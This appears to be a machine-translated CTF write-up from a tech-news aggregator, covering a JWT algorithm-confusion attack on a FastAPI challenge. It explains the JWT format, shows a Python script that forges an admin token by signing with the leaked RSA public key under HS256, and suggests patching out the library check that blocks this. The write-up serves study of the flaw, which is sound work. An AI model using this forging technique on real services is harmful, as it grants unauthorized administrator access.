Shulou(Shulou.com)05/31 Report--

How to analyze CTF in JWT, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

I came across a ctf these two days, as follows:

Probably, enter the built-in token of the question to get the access_token of the backend response, and find that you need admin to view the corresponding profile file after logging in.

In fact, there are hints on the title, FastAPI framework and JWT verification.

Look it up on the Internet. FastAPI has a default document interface / docs

/ there is a public key under debug

Then went to Baidu on the Internet and got a lot of JWT materials:

The abbreviation of Json Web Token is JWT, which is usually called Json token. It is a form of secure transmission of information as Json objects defined in RFC 7519. The information stored in JWT is digitally signed, so it can be trusted and understood. JWT can be signed using the HMAC algorithm or using RSA/ECDSA 's public / private key.

JWT is divided into three parts

Header

Payload

Signature

These three parts pass the'. 'join, probably in the format of Header.Payload.Signature

Header section:

Contains two fields, typ (token type) and alg (encryption algorithm).

For example:

{"alg": "RS256", "typ": "JWT"}

JWT supports asymmetric encryption as well as symmetric encryption, and the encryption algorithm is determined by the algvalue of the header.

That's the problem.

To quote the explanation of Big WP:

When using RS256, the flow of the program is:

Sign the JWT with the private key.

Use the public key to verify the integrity of the received JWT.

When using HS256, the flow of the program is:

Use the key to sign the JWT.

Again, use this key to verify the integrity of the JWT. Obviously, this key cannot be leaked.

So if we know the public key, then we can do this:

Received a legal JWT using the RS256 signature algorithm.

Modify the payload of JWT as we want, and change the algorithm of header to HS256.

Re-sign our modified public key with the HS256 algorithm using the known public key.

Send it to the server. At this point, the server uses the public key + HS256 algorithm to check the JWT and finds that there is no problem, it will think that this is a legitimate JWT.

Payload part

The Payload section generally contains some valid declarations, which are divided into three types

Registered

Public

Private

Registered are predefined declarations:

Iss (issuer): issuer

Exp (expiration time): expiration time

Sub (subject): body

Aud (audience): audience

Nbf (Not Before): effective time

Iat (Issued At): time of issue

Jti (JWT ID): number

Public Public statement:

Usually put some user information.

Private Custom statement:

Used for information sharing among all parties.

For example:

{"sub": "admin", "exp": 9902085613} Signature part:

Signature consists of two main parts:

Header and payload after base64

Secert key

And then encrypt it using the encryption method we chose earlier.

It is roughly as follows:

{rs256_encode (base64_encode (header) +'.'+ base64_encode (payload) + secert)}

The composition of so's entire JWT can be shown in the following figure:

Source of picture:

After reading this article on Session, Cookie and Token, we can argue with the interviewer.

So, back to the topic itself.

Our goal is clear:

With the public key exposed in the previous / debug, construct the JWT that uses HS256.

Replace the JWT into our packet.

The backend reads the HS256 in the header field, decrypts the JWT through the local public key in the form of symmetric encryption, and then reads the data with the authority of sub=admin.

The construction script is as follows:

Import jwtPUBLIC_KEY = "- BEGIN RSA PUBLIC KEY-\ nMIICCgKCAgEAn/KiHQ+/zwE7kY/Xf89PY6SowSb7CUk2b+lSVqC9u+R4BaE/5tNF\ neNlneGNny6fQhCRA+Pdw1UJSnNpG26z/uOK8+H7fMb2Da5t/94wavw410sCKVbvf\ nft8gKquUaeq//tp20BETeS5MWIXp5EXCE+lEdAHgmWWoMVMIOXwaKTMnCVGJ2SRr\ n+xH9147FZqOa/17PYIIHuUDlfeGi+Iu7T6a+QZ0tvmHL6j9Onk/EEONuUDfElonY\ nM688jhuAM/FSLfMzdyk23mJk3CKPah58nzVmb1YRyfBWiVFGYQqMCBnWgoGOanpd\ n46Fp1ff1zBn4sZTfPSOus/+00D5Lxh7bsbRa6A1vAApfmTcu026lIb7gbG7DU1/s\ neDId9s1qA5BJpzWFKO4ztkPGvPTUok8hQBMDaSH1JOoFQgfJIfC7w2CQe+KbodQL\ n3akKQDCZhcoA4tf5VC6ODJpFxCn6blML5cD6veOBPJiIk8DBRgmt2AHzOUju+5ns\ nQcplOVxW5TFYxLqeJ8FPWqQcVekZ749FjchtAwPlUsoWIH0PTSun38ua8usrwTXb\ npBlf4r0wz22FPqaecvp7z6Rj/xfDauDGDSU4hmn/TY9Fr+OmFJPW/9k2RAv7KEFv\ nFCLP/3U3r0FMwSe/FPHmt5fjAtsGlZLj+bZsgwFllYeD90VQU8Ds+KkCAwEAAQ==\ n-END RSA PUBLIC KEY-\ n" payload = {"sub": "admin", "exp": 9902085613, # expiration time Just write anything} header = {"typ": "JWT", "alg": "HS256"} encoded = jwt.encode (payload, PUBLIC_KEY, algorithm='HS256', headers=header) print (encoded)

After the update, JWT adds a verification mechanism to solve this vulnerability, which is mainly used to detect whether public key is an asymmetric encrypted public key.

Errors will be reported when using the script, which can be commented out directly into the source file.

Finally:

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.